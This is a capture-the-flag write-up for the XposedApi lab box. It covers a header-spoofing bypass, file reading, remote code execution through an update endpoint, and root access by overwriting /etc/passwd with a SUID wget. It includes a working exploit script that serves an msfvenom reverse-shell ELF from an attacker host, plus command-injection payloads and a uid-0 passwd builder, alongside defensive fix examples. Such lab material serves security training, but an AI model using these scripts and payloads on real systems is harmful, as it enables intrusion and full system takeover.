XposedApi
Offsec PG Practice
INIT FOOTHOLD:
I started my recon with nmapAutomator and found a few ports open.
As you can see, the initial nmap port scan reports only port 22 open, running OpenSSH 7.9p1, which has no public exploit that gives RCE.
After some time nmap completed its full scan and found port 13337 open as well.
So we headed over to port 13337, which hosts a Remote Management Server meant for administrative use. It should not be exposed to the internet, but it is.
There are a couple of endpoints:
/version==>Gives the version of the hosted app.
/log==>Gives the app's logs, but only accepts connections from localhost.
/update==>Takes a username and a URL in JSON; the URL must point to an ELF that is used to update the app.
/restart==>Restarts the app.
So we first looked at /log to see how it checks whether a request is coming from localhost.
One way to do that is to check the X-Forwarded-For header, or maybe X-Remote-Ip and the like. These implementations are often buggy, and relying on an HTTP header that the client controls is not a good idea: the only address the server can trust is the TCP peer address of the connection, and any X-* header on a directly exposed service is just attacker input.
So I tried to bypass it by adding an X-Forwarded-For header, and we did bypass the check; it gave us some info.
Using that info I made the endpoint read local files, and as you can see we are able to read /etc/passwd.
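The localhost check described above, written out as an added example (this is not the XposedApi code; the request model, a headers dict plus the TCP peer address, is an assumption standing in for whatever framework the real app uses). The vulnerable version decides "local" from X-Forwarded-For, so a client on the internet bypasses it with one header; the hardened version ignores headers entirely:

```python
"""Localhost-only check: trusting X-Forwarded-For vs. using the socket peer address.

Added illustration, not the XposedApi code. The request model (headers dict
plus the TCP peer address as a string) is an assumption.
"""
from ipaddress import ip_address


def _is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; anything unparsable is treated as remote."""
    try:
        return ip_address(addr).is_loopback
    except ValueError:
        return False


def is_local_vulnerable(headers: dict, peer_addr: str) -> bool:
    """The buggy pattern: believe the client-supplied X-Forwarded-For header.

    With no trusted reverse proxy in front of the service, the header is
    whatever the client wrote, so the check is bypassed by sending
    'X-Forwarded-For: 127.0.0.1'.
    """
    xff = next((v for k, v in headers.items() if k.lower() == "x-forwarded-for"), None)
    claimed = xff.split(",")[0].strip() if xff else peer_addr   # first hop, as proxies do
    return _is_loopback(claimed)


def is_local_hardened(peer_addr: str) -> bool:
    """Decide from the TCP peer address only; request headers are ignored."""
    return _is_loopback(peer_addr)


# Constructed requests: an attacker at 10.10.14.5 talking straight to port 13337.
ATTACKER = "10.10.14.5"
HONEST = {"Host": "target:13337"}
SPOOFED = {"Host": "target:13337", "X-Forwarded-For": "127.0.0.1"}


def demo() -> dict:
    """Outcome of each check for the two constructed requests."""
    return {
        "vuln_honest": is_local_vulnerable(HONEST, ATTACKER),    # False: no header, real IP used
        "vuln_spoofed": is_local_vulnerable(SPOOFED, ATTACKER),  # True: bypassed by the header
        "hard_spoofed": is_local_hardened(ATTACKER),             # False: header never consulted
        "hard_local": is_local_hardened("127.0.0.1"),            # True: genuinely local
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

If the service legitimately sits behind a reverse proxy, the fix is not to read the header yourself but to let the framework rewrite the peer address from a fixed, trusted number of proxy hops (for example Werkzeug's ProxyFix with an explicit x_for count); a directly exposed port like this one has no proxy, so the peer address alone is correct.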
We then explored the /update endpoint, which, as I said before, takes a username and a URL for the ELF file that is then used to update the app.
Exploitation
There are different ways to exploit this app to get a foothold.
1. RCE through the /update and /restart endpoints.
As we can see, /update fetches an ELF from a user-supplied URL and /restart restarts the app with that ELF, so I prepared a reverse-shell ELF with msfvenom.
Then I hosted it, used /update to make the app fetch my ELF, hit /restart so it executed, and BOOM, I got a shell back.
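The steps above as one script, added here as an example and not the box's code or an OffSec tool. Assumptions, because the writeup does not give them: the JSON field names "user" and "url", that both endpoints accept POST, the msfvenom payload linux/x64/shell_reverse_tcp, and the placeholder addresses. Start a listener (nc -lvnp 4444) before running it.

```python
"""Foothold via /update + /restart: generate a reverse-shell ELF, serve it, point the app at it.

Added example. Field names, HTTP method, payload and addresses are assumptions.
"""
import functools
import http.server
import json
import socketserver
import subprocess
import threading
import urllib.request

TARGET = "http://TARGET_IP:13337"   # placeholder: the box's address
LHOST, LPORT = "ATTACKER_IP", 4444  # placeholder: where the shell calls back
HTTP_PORT = 8000                    # port the ELF is served from
ELF_NAME = "shell.elf"


def update_body(user: str, url: str) -> bytes:
    """JSON body for /update; the field names are an assumption."""
    return json.dumps({"user": user, "url": url}).encode()


def msfvenom_cmd(lhost: str, lport: int, out: str = ELF_NAME) -> list:
    """argv for msfvenom building a Linux x64 reverse shell ELF (run by main())."""
    return ["msfvenom", "-p", "linux/x64/shell_reverse_tcp",
            f"LHOST={lhost}", f"LPORT={lport}", "-f", "elf", "-o", out]


def serve(directory: str, port: int) -> socketserver.TCPServer:
    """Serve `directory` over HTTP in a background thread so the target can fetch the ELF."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=directory)
    socketserver.TCPServer.allow_reuse_address = True
    httpd = socketserver.TCPServer(("0.0.0.0", port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def post(url: str, body: bytes = b"") -> str:
    """POST `body` as JSON and return the response text."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    subprocess.run(msfvenom_cmd(LHOST, LPORT), check=True)
    httpd = serve(".", HTTP_PORT)
    elf_url = f"http://{LHOST}:{HTTP_PORT}/{ELF_NAME}"
    print(post(f"{TARGET}/update", update_body("admin", elf_url)))
    print(post(f"{TARGET}/restart"))   # app restarts with our ELF; shell arrives on LHOST:LPORT
    httpd.shutdown()
```

The same script covers the second method below: put the injected command in the url field instead of a clean URL and skip the /restart call.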
2. Leaking the source code and identifying the RCE.
Since we have an LFI and we are already in the web root, trying common file names like main.py, app.py or api.py may give us the source code.
If you look at the code of the /update endpoint you will see that the input is passed to os.system() without any sanitization,
which leads to command execution.
So I hosted my reverse-shell script on my machine, prepared a payload for the update endpoint, and executed it through this command execution bug to get the shell.
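The os.system() sink, shown as an added example beside its fix (this is a guess at the pattern the leaked source shows, user input concatenated into a shell command, not the app's real code). To keep it runnable offline the download tool is replaced by echo, so the effect of the injection shows up in the output instead of on disk:

```python
"""Command injection through a shell-built command, beside the safe version.

Added example; the handler shape is assumed, not copied from the app. FETCHER
is 'echo' instead of the real downloader so the demo runs offline.
"""
import shlex
import subprocess
from urllib.parse import urlparse

FETCHER = "echo"   # stands in for wget/curl in the real handler


def update_vulnerable(url: str) -> str:
    """String concatenation + shell: /bin/sh parses the URL, so ';', '$(...)' etc. run."""
    cmd = f"{FETCHER} fetching {url}"          # same flaw as os.system(cmd)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def update_quoted(url: str) -> str:
    """If a shell is unavoidable, shlex.quote makes the URL a single literal word."""
    cmd = f"{FETCHER} fetching {shlex.quote(url)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def update_hardened(url: str) -> str:
    """Validate the URL, then pass it as one argv element; no shell is involved at all."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError(f"rejected url: {url!r}")
    return subprocess.run([FETCHER, "fetching", url], capture_output=True, text=True).stdout


# Constructed payloads: a URL followed by an injected command, and a command substitution.
PAYLOAD_SEMI = "http://10.10.14.5/app.elf; echo INJECTED"
PAYLOAD_SUBST = "http://10.10.14.5/$(echo INJ2)"


if __name__ == "__main__":
    print("vulnerable:", repr(update_vulnerable(PAYLOAD_SEMI)))   # second line 'INJECTED'
    print("vulnerable:", repr(update_vulnerable(PAYLOAD_SUBST)))  # path becomes /INJ2
    print("quoted:    ", repr(update_quoted(PAYLOAD_SEMI)))       # whole payload echoed literally
    print("hardened:  ", repr(update_hardened(PAYLOAD_SEMI)))     # same: passes validation, no shell
    try:
        update_hardened("file:///etc/passwd; echo X")
    except ValueError as exc:
        print("hardened:  ", exc)
```

With the real downloader the injected command runs as the service user, which is exactly how the payload on the update endpoint gives a shell; the hardened version still fetches a URL that contains a semicolon, but as data, not as a second command.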
PRIVESC
Once I got in, before running any enumeration script I quickly checked the setuid binaries.
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/wget
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
As you can see, wget has the SUID bit set, so it can download a file and write it anywhere we want, which gives us an arbitrary file write as root.
With that we can overwrite /etc/shadow, /etc/passwd or /etc/sudoers to get root privileges.
I decided to overwrite /etc/passwd.
I used openssl to create a password hash, added a new uid 0 entry with it to a copy of the passwd file, and then used wget to write that copy to /etc/passwd.
Then I ran su - wh0am1, entered my password and got root.
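Building and checking the replacement passwd file, as an added example (not the writeup's own commands). The sample passwd content is constructed, the username wh0am1 and the hash are placeholders, and the helper that calls openssl assumes it is on PATH; su accepts the new user because the hash sits in the second field (not "x", which would send it to /etc/shadow) and uid 0 is what makes the shell root:

```python
"""Prepare the passwd file that the SUID wget writes over /etc/passwd, and verify it.

Added example. wget -O writes wherever it is told, and with the SUID bit it does
so as root, so the upload replaces /etc/passwd wholesale: the copy must keep
every existing entry and only add one.
"""
import subprocess

# Constructed stand-in for the target's /etc/passwd (real one: read it via the LFI or on the box).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "svc:x:1000:1000::/home/svc:/bin/bash\n"
)


def openssl_hash(password: str) -> str:
    """SHA-512 crypt hash via `openssl passwd -6`; assumes openssl is installed."""
    out = subprocess.run(["openssl", "passwd", "-6", password],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def add_root_user(passwd: str, user: str, pw_hash: str) -> str:
    """Append a uid 0 / gid 0 entry carrying the hash inline, keeping all existing lines."""
    if any(line.split(":")[0] == user for line in passwd.splitlines()):
        raise ValueError(f"{user!r} already exists in passwd")
    if not passwd.endswith("\n"):
        passwd += "\n"
    return passwd + f"{user}:{pw_hash}:0:0:root:/root:/bin/bash\n"


def root_users(passwd: str) -> list:
    """Every account with uid 0, so the file can be checked before it is uploaded."""
    names = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0":
            names.append(fields[0])
    return names


def wget_write_cmd(attacker_url: str, dest: str = "/etc/passwd") -> str:
    """The one-liner run on the target: the SUID wget writes the download to dest as root."""
    return f"wget -O {dest} {attacker_url}"


if __name__ == "__main__":
    new_passwd = add_root_user(SAMPLE_PASSWD, "wh0am1", openssl_hash("Password123!"))
    print(new_passwd)
    print("uid 0 accounts:", root_users(new_passwd))
    print("on target:", wget_write_cmd("http://ATTACKER_IP/passwd"))
    print("then:      su - wh0am1")
```

Check root_users() shows both root and the new account before serving the file; an upload that drops root's own line, or one that is truncated mid-download, leaves the box without a usable /etc/passwd.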
Thanks For Reading.
Happy Hacking